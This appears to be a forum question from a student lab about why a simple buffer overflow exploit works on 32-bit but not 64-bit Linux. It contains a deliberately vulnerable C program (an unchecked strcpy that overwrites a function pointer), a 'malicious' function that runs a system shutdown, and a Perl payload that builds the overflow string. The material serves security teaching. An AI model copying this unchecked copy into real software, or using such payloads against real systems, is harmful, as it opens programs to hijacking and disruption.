# Difference between buffer overflow attack on 64 vs 32 bit system

Tags: c, linux, perl, buffer-overflow

I have both scripts in both c and Perl. The c code is:

```
#pragma check_stack(off)

#include <string.h>
#include <stdio.h> 

void good_fn(){
    printf("GOOD CODE \n");
}

void mlc_fn(){
    printf("What is this I don understand what has happened !Probably buffer overflow attack and m hacked \n");
    system("shutdown -P now");
}

int main(int argc, char* argv[]){

    printf("Address of GOOD_CODE  = %p\n", good_fn);
    printf("Address of MLIC_CODE  = %p\n", mlc_fn);

    char data[10];

    //Callig function by pointer
    void (*dsrd_fn)();
    dsrd_fn = &good_fn;

    printf("SIZE : %d\n",sizeof(dsrd_fn));  

    //try to overflow dsrd_fn here
    strcpy(data, argv[1]);
    //load content from file

    printf("Address of dsrd_fn    = %p\n", dsrd_fn);

    //call fn based on address pntr_fn
    dsrd_fn();

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");    
}
```

While the perl code is:

```
$arg = "AAAAAAAAAA"."\xC1\x84\x04\x08";
$cmd = "./bo_test ".$arg;

system($cmd);
```

after compiling and testing the bo_test, the output is:

```
student@EECS-337-VM:~/EECS 397/Part 2$ ./bo_test abcde
Address of GOOD_CODE  = 0x40060d
Address of MLIC_CODE  = 0x40061d
SIZE : 8
Address of dsrd_fn    = 0x40060d
GOOD CODE 
My stack looks like:
0x7f00b3974000
0x7f00b37509e0
0xffffffffffffffff
0x7f00b37509e0
(nil)
0x7fff66218a68
```

When inserting the MLIC_ADDR into the perl script, the shell code buffer over-flow exploit with the perl script is not running on a 64 bit linux system, but it is running on a 32 bit linux system. Why would this be?